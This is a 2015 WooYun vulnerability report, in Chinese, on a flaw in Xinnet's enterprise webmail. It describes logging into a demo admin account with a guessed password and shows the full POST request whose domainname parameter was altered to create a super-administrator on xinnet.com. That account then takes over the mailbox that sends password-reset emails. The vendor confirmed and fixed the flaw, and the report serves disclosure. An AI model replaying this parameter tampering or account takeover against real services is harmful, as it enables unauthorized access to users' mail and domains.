当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120944

漏洞标题:新网某漏洞可导致劫持任意域名

相关厂商:新网华通信息技术有限公司

漏洞作者: 鸟云厂商

提交时间:2015-06-16 19:12

修复时间:2015-08-01 09:38

公开时间:2015-08-01 09:38

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-16: 细节已通知厂商并且等待厂商处理中
2015-06-17: 厂商已经确认,细节仅向厂商公开
2015-06-27: 细节向核心白帽子及相关领域专家公开
2015-07-07: 细节向普通白帽子公开
2015-07-17: 细节向实习白帽子公开
2015-08-01: 细节向公众公开

简要描述:

我只想说,新网我们还能不能好好做朋友了?

详细说明:

在测一个漏洞,由于数据有点多所以读取得慢。
于是顺手打开了新网的邮箱登陆界面
http://webmail.xinnet.com
右上角有个“【重要通知】系统升级后点击查看注意事项”

EC02FE26-7545-4E9B-A9F4-61D018E63792.png


顺手点了,看看能不能有什么打码不注意的地方
找一圈发现没啥
但是有一段是介绍企业邮箱超管功能的
截图显示演示账户是[email protected]

clip_image013 (1).jpg


来到http://webmail.xinnet.asia/
尝试登录[email protected]
第一次就试出密码是xinnet123
确实是管理员账号

71A49D67-4A1B-4F62-8294-B0FD6738A4D4.png


进入管理员界面
http://webmail.xinnet.asia/app/eadmin/msetnav
这里发现了一个功能:添加用户。由于企业邮箱设计的特性,这个功能我会很注意。之前也看过其他的邮件系统都不存在问题。但是新网,跪了。
添加用户,把“企业管理员”的选框打钩
提交,抓包

DD085D55-A88E-4313-9D20-977F2F91ACA0.png


POST /app/eadmin/user/user_add HTTP/1.1
Host: webmail.xinnet.com
Proxy-Connection: keep-alive
Content-Length: 615
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://webmail.xinnet.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://webmail.xinnet.com/app/eadmin/user/user_preadd?method=preAddUser&domainname=xinnet.asia&orgId=
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: ***mask***
usernameLast=wooyun&usernameFirst=wooyun&userid=wooyun&domainname=xinnet.asia&adminPermission=1&corporganizationname=%E6%96%B0%E7%BD%91%E4%BA%91%E9%82%AE%E6%B5%8B%E8%AF%95&corporganizationiid=&oldcorporganizationiid=&newPassword=*******&mailforever=1&homeemailaddress=&homewebpage=&msn=&qq=&mobilephone=&otherphone=&companyname=&officestreet=&officepostalcode=&duty=&workphone=&workfaxnumber=&workemailaddress=&businesswebpage=&selectmail=1&userquota=365&pop=1&imap=1&stmp=1&webmail=1&maxrcptnum=50&maxmessagesize=50&maxattachsize=50&selectfilemanage=1&networkspace=50&filemanageforever=1&userAliases=&ipaddress=


这里很关键,把domainname=xinnet.asia改成xinnet.com
提示添加成功,
来到http://webmail.xinnet.com尝试登录
擦咧,成功了。
可以看到,确实是超管权限。
进入管理页面
这之间我在新网注册了账号,并模拟密码找回流程
发现最后给我们发新密码的是:[email protected]
来重置这个邮箱的密码
重置为[email protected]
登录邮箱,看“已发送”

屏幕快照 2015-06-16 下午6.41.14.png


每页10封邮件,共137429页,也就是上百万封邮件。
现在在加载中,我的Chrome已经开始卡顿了。。。。。
电脑配置低,网络差。没办法完整看到列表了。。。
下图证明这个邮箱确实是发送密码的

90220077-B742-428B-A4FB-676F9B042DC9.png


漏洞证明:

修复方案:

版权声明:转载请注明来源 鸟云厂商@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-06-17 09:36

厂商回复:

非常感谢路人甲@乌云,小新正在玩命确认及修复中

最新状态:

2015-06-18:漏洞已修复,非常感谢鸟云厂商@乌云